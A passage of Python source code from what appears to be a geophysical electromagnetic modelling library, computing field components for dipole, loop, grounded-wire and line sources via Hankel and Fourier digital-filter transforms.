/ model.ztilde[model.rlayer - 1]
amp_te_hx_2 = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 2 - 1)\
/ model.r / (4 * np.pi)
amp_tm_hy_1 = -model.k[model.slayer - 1]** 2 / (4 * np.pi) \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ model.r ** 2
amp_tm_hy_2 = - amp_tm_hy_1 / model.r * 2
amp_te_hy_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (4 * np.pi) * (model.rx - model.sx) \
* (model.ry - model.sy) / model.r ** 2
amp_te_hy_2 = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (2 * np.pi) * (model.rx - model.sx) \
* (model.ry - model.sy) / model.r ** 3
amp_te_hz = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_1 * tm_er_1 + amp_tm_ex_2 * tm_er_2 \
+ amp_te_ex_1 * te_er_1 + amp_te_ex_2 * te_er_2
ans["e_y"] = amp_tm_ey_1 * tm_er_1 + amp_tm_ey_2 * tm_er_2 \
+ amp_te_ey_1 * te_er_1 + amp_te_ey_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_1 * tm_hr_1 + amp_tm_hx_2 * tm_hr_2 \
+ amp_te_hx_1 * te_hr_1 + amp_te_hx_2 * te_hr_2
ans["h_y"] = amp_tm_hy_1 * tm_hr_1 + amp_tm_hy_2 * tm_hr_2 \
+ amp_te_hy_1 * te_hr_1 + amp_te_hy_2 * te_hr_2
ans["h_z"] = amp_te_hz * te_hz
return ans
@staticmethod
def hmdy(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hmd(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5]* model.lambda_**2) / model.r
amp_tm_ex_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_2 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
/ (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r)
amp_te_ex_1 = -model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_2 = model.ztilde[model.slayer - 1] / (4 * np.pi) \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r)
amp_tm_ey_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_2 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ey_1 = model.ztilde[0, model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ez = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r)
amp_tm_hx_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_2 = - amp_tm_hx_1 * 2 / model.r
amp_te_hx_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_hx_2 = - amp_te_hx_1* 2 / model.r
amp_tm_hy_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hy_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_hy_2 = - model.ztilde[0, model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hz = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_1 * tm_er_1 + amp_tm_ex_2 * tm_er_2 \
+ amp_te_ex_1 * te_er_1 + amp_te_ex_2 * te_er_2
ans["e_y"] = amp_tm_ey_1 * tm_er_1 + amp_tm_ey_2 * tm_er_2 \
+ amp_te_ey_1 * te_er_1 + amp_te_ey_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_1 * tm_hr_1 + amp_tm_hx_2 * tm_hr_2 \
+ amp_te_hx_1 * te_hr_1 + amp_te_hx_2 * te_hr_2
ans["h_y"] = amp_tm_hy_1 * tm_hr_1 + amp_tm_hy_2 * tm_hr_2 \
+ amp_te_hy_1 * te_hr_1 + amp_te_hy_2 * te_hr_2
ans["h_z"] = amp_te_hz * te_hz
return ans
@staticmethod
def ved(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_ved(model, omega)
ans = {}
e_phai = np.dot(wt1, kernel[0] * model.lambda_ ** 2) / model.r
e_z = np.dot(wt0, kernel[1] * model.lambda_ ** 3) / model.r
h_r = np.dot(wt1, kernel[2] * model.lambda_ ** 2) / model.r
ans["e_x"] = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* model.cos_phi * e_phai
ans["e_y"] = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* model.sin_phi * e_phai
ans["e_z"] = 1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* e_z
ans["h_x"] = -1 / (4 * np.pi) * model.sin_phi * h_r
ans["h_y"] = -1 / (4 * np.pi) * model.cos_phi * h_r
ans["h_z"] = 0
return ans
@staticmethod
def hedx(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_ ** 2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_g_1 = (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_g_2 = - (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) \
/ (4 * np.pi \
* model.ytilde[model.rlayer - 1])
amp_te_ex_g_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_g_2 = - model.ztilde[model.slayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_ex_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ey_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r**3 )
amp_te_ey_g_1 = + model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_g_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ez = (model.rx - model.sx) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r)
amp_tm_hx_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_te_hx_g_1 = + (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_tm_hy_g_1 = -(model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_g_2 = (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hy_g_1 = - (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_g_2 = (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (4 * np.pi)
amp_te_hz_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_g_1 * tm_er_1 + amp_tm_ex_g_2 * tm_er_2 \
+ amp_te_ex_g_1 * te_er_1 + amp_te_ex_g_2 * te_er_2 \
+ amp_te_ex_line * te_er_1
ans["e_y"] = amp_tm_ey_g_1 * tm_er_1 + amp_tm_ey_g_2 * tm_er_2 \
+ amp_te_ey_g_1 * te_er_1 + amp_te_ey_g_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_g_1 * tm_hr_1 + amp_tm_hx_g_2 * tm_hr_2 \
+ amp_te_hx_g_1 * te_hr_1 + amp_te_hx_g_2 * te_hr_2
ans["h_y"] = amp_tm_hy_g_1 * tm_hr_1 + amp_tm_hy_g_2 * tm_hr_2 \
+ amp_te_hy_g_1 * te_hr_1 + amp_te_hy_g_2 * te_hr_2 \
+ amp_te_hy_line * te_hr_1
ans["h_z"] = amp_te_hz_line * te_hz
return ans
@staticmethod
def hedy(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ex_g_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_g_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ey_g_1 = (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) \
/ (4 * np.pi* model.ytilde[model.rlayer - 1])
amp_te_ey_g_1 = model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_g_2 = -model.ztilde[model.slayer - 1] \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_ey_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ez = (model.ry - model.sy) / (4 * np.pi \
* model.ytilde[model.rlayer - 1] * model.r)
amp_tm_hx_g_1 = (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hx_g_1 = + (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_tm_hy_g_1 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_g_2 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_te_hy_g_1 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_g_2 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hz_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_g_1 * tm_er_1 + amp_tm_ex_g_2 * tm_er_2 \
+ amp_te_ex_g_1 * te_er_1 + amp_te_ex_g_2 * te_er_2
ans["e_y"] = amp_tm_ey_g_1 * tm_er_1 + amp_tm_ey_g_2 * tm_er_2 \
+ amp_te_ey_g_1 * te_er_1 + amp_te_ey_g_2 * te_er_2 \
+ amp_te_ey_line * te_er_1
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_g_1 * tm_hr_1 + amp_tm_hx_g_2 * tm_hr_2 \
+ amp_te_hx_g_1 * te_hr_1 + amp_te_hx_g_2 * te_hr_2 \
+ amp_te_hx_line * te_hr_1
ans["h_y"] = amp_tm_hy_g_1 * tm_hr_1 + amp_tm_hy_g_2 * tm_hr_2 \
+ amp_te_hy_g_1 * te_hr_1 + amp_te_hy_g_2 * te_hr_2
ans["h_z"] = amp_te_hz_line * te_hz
return ans
@staticmethod
def circular_loop(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.src.radius
kernel = kernels.compute_kernel_circular(model, omega)
ans = {}
e_phai = np.dot(wt1, kernel[0]) / model.src.radius
h_r = np.dot(wt1, kernel[1]) / model.src.radius
h_z = np.dot(wt1, kernel[2]) / model.src.radius
ans["e_x"] = model.ztilde[model.slayer - 1] * model.src.radius\
* model.sin_phi / 2 * e_phai
ans["e_y"] = -model.ztilde[model.slayer - 1] * model.src.radius\
* model.cos_phi / 2 * e_phai
ans["e_z"] = 0
ans["h_x"] = -model.src.radius * model.ztilde[model.slayer - 1]\
/ model.ztilde[model.rlayer - 1] \
* model.cos_phi / 2 * h_r
ans["h_y"] = -model.src.radius * model.ztilde[model.slayer - 1]\
/ model.ztilde[model.rlayer - 1] \
* model.sin_phi / 2 * h_r
ans["h_z"] = model.src.radius * model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / 2 * h_z
return ans
@staticmethod
def coincident_loop(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_coincident(model, omega)
ans = {}
h_z_co = np.dot(wt1, kernel[0]) / model.src.radius
ans["e_x"] = 0
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = 0
ans["h_z"] = (1 * np.pi * model.src.radius ** 2 * h_z_co)
return ans
@staticmethod
def grounded_wire(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
y_base_wire = np.ones((model.filter_length, model.src.nsplit)) \
* np.array([y_base]).T
lambda_ = y_base_wire / model.rn
kernel = np.zeros((6, model.filter_length, model.src.nsplit), dtype=complex)
for i in range(model.src.nsplit):
model.lambda_ = lambda_[:,i]
kernel[:,:,i] = kernels.compute_kernel_hed(model, omega)
model.lambda_ = lambda_
tm_er_g_first = np.dot(wt1, kernel[0][:, 0]) / model.rn[0]
tm_er_g_end = np.dot(wt1, kernel[0][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_er_g_first = np.dot(wt1, kernel[1][:, 0]) / model.rn[0]
te_er_g_end = np.dot(wt1, kernel[1][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
tm_ez_1 = np.dot(wt0, kernel[2][:, 0] * model.lambda_[:, 0]) \
/ model.rn[0]
tm_ez_2 = np.dot(wt0, kernel[2][:, model.src.nsplit - 1] \
* model.lambda_[:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
tm_hr_g_first = np.dot(wt1, kernel[3][:, 0]) / model.rn[0]
tm_hr_g_end = np.dot(wt1, kernel[3][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_hr_g_first = np.dot(wt1, kernel[4][:, 0]) / model.rn[0]
te_hr_g_end = np.dot(wt1, kernel[4][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_hz_l = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.rn
te_ex_l = np.dot(wt0, kernel[1] * model.lambda_) / model.rn
te_hy_l = np.dot(wt0, kernel[4] * model.lambda_) / model.rn
amp_tm_ex_1 = (model.xx[0] / model.rn[0]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ex_2 = (-model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_te_ex_1 = (model.xx[0] / model.rn[0]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_ex_2 = (-model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
te_ex_line = -model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ey_1 = (model.yy[0] / model.rn[0]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ey_2 = (-model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_te_ey_1 = (model.yy[0] / model.rn[0]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_ey_2 = (-model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ez_1 = 1 / (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ez_2 = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_hx_1 = 1 / (4 * np.pi) * model.yy[0] / model.rn[0]
amp_tm_hx_2 = - 1 / (4 *np.pi) * model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_te_hx_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.yy[0] / model.rn[0]
amp_te_hx_2 = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 *np.pi) \
* model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_tm_hy_1 = -1 / (4 * np.pi) * model.xx[0] / model.rn[0]
amp_tm_hy_2 = 1 / ( 4 *np.pi) * model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_te_hy_1 = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.xx[0] / model.rn[0]
amp_te_hy_2 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
rot_ans = {}
rot_ans["e_x"] = (amp_tm_ex_1 * tm_er_g_first \
+ amp_tm_ex_2 * tm_er_g_end \
+ amp_te_ex_1 * te_er_g_first \
+ amp_te_ex_2 * te_er_g_end) \
+ te_ex_line * model.ds \
* np.dot(te_ex_l, np.ones((model.src.nsplit)))
rot_ans["e_y"] = amp_tm_ey_1 * tm_er_g_first + amp_tm_ey_2 * tm_er_g_end \
+ amp_te_ey_1 * te_er_g_first \
+ amp_te_ey_2 * te_er_g_end
rot_ans["e_z"] = amp_tm_ez_1 * tm_ez_1 + amp_tm_ez_2 * tm_ez_2
rot_ans["h_x"] = (amp_tm_hx_1 * tm_hr_g_first \
+ amp_tm_hx_2 * tm_hr_g_end \
+ amp_te_hx_1 * te_hr_g_first \
+ amp_te_hx_2 * te_hr_g_end)
rot_ans["h_y"] = amp_tm_hy_1 * tm_hr_g_first \
+ amp_tm_hy_2 * tm_hr_g_end \
+ amp_te_hy_1 * te_hr_g_first \
+ amp_te_hy_2 * te_hr_g_end \
+ te_hy_line * model.ds \
* np.dot(te_hy_l, np.ones((model.src.nsplit)))
rot_ans["h_z"] = np.dot(model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* model.yy / model.rn * model.ds / (4*np.pi) \
,te_hz_l.T)
ans = {}
ans["e_x"] = model.cos_theta * rot_ans["e_x"] - model.sin_theta * rot_ans["e_y"]
ans["e_y"] = model.cos_theta * rot_ans["e_y"] + model.sin_theta * rot_ans["e_x"]
ans["e_z"] = rot_ans["e_z"]
ans["h_x"] = model.cos_theta * rot_ans["h_x"] - model.sin_theta * rot_ans["h_y"]
ans["h_y"] = model.cos_theta * rot_ans["h_y"] + model.sin_theta * rot_ans["h_x"]
ans["h_z"] = rot_ans["h_z"]
return ans
@staticmethod
def loop_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_ex_l = np.dot(wt0, kernel[1] * model.lambda_) / model.rn
te_hy_l = np.dot(wt0, kernel[4] * model.lambda_) / model.rn
te_hz_l = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.rn
te_ex_line = -model.ztilde[model.slayer - 1] / (4 * np.pi)
te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
ans["e_x"] = te_ex_line * model.ds \
* np.dot(te_ex_l, np.ones((model.src.num_dipole,1)))
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = te_hy_line * model.ds \
* np.dot(te_hy_l, np.ones((model.src.num_dipole,1)))
ans["h_z"] = np.dot(model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* model.yy / model.rn * model.ds / (4*np.pi) \
, te_hz_l.T)
return ans
@staticmethod
def x_line_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_te_ex_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_te_hz_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = model.ds * amp_te_ex_line * te_er_1
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = model.ds * amp_te_hy_line * te_hr_1
ans["h_z"] = model.ds * amp_te_hz_line * te_hz
return ans
@staticmethod
def y_line_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.r
amp_te_ey_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_hx_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_te_hz_line = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = 0
ans["e_y"] = model.ds * amp_te_ey_line * te_er_1
ans["e_z"] = 0
ans["h_x"] = model.ds * amp_te_hx_line * te_hr_1
ans["h_y"] = 0
ans["h_z"] = model.ds * amp_te_hz_line * te_hz
return ans
class FourierTransform:
@staticmethod
def euler_transform(model, time):
"""
フーリエ変換のデジタルフィルタでオイラーのフィルタを用いた変換。
時間微分でないものは後々実装予定。
"""
ans = {}
y_base_time, wt0_time, wt1_time = filters.load_fft_filter(
'raito_time_250')
filter_length_time = len(y_base_time)
e_x_set = np.zeros((filter_length_time, 1), dtype=complex)
e_y_set = np.zeros((filter_length_time, 1), dtype=complex)
e_z_set = np.zeros((filter_length_time, 1), dtype=complex)
h_x_set = np.zeros((filter_length_time, 1), dtype=complex)
h_y_set = np.zeros((filter_length_time, 1), dtype=complex)
h_z_set = np.zeros((filter_length_time, 1), dtype=complex)
time_range = time - model.src.freqtime[0]
omega_set = y_base_time / time_range
for ii in range(filter_length_time):
omega = omega_set[ii]
hankel_result = model.src.hankel_transform(model, omega)
e_x_set[ii] = hankel_result["e_x"]
e_y_set[ii] = hankel_result["e_y"]
e_z_set[ii] = hankel_result["e_z"]
h_x_set[ii] = hankel_result["h_x"]
h_y_set[ii] = hankel_result["h_y"]
h_z_set[ii] = hankel_result["h_z"]
ans["e_x"] = -np.dot(wt1_time.T, np.imag(e_x_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["e_y"] = -np.dot(wt1_time.T, np.imag(e_y_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["e_z"] = -np.dot(wt1_time.T, np.imag(e_z_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["h_x"] = -np.dot(wt1_time.T, np.imag(h_x_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["h_y"] = -np.dot(wt1_time.T, np.imag(h_y_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
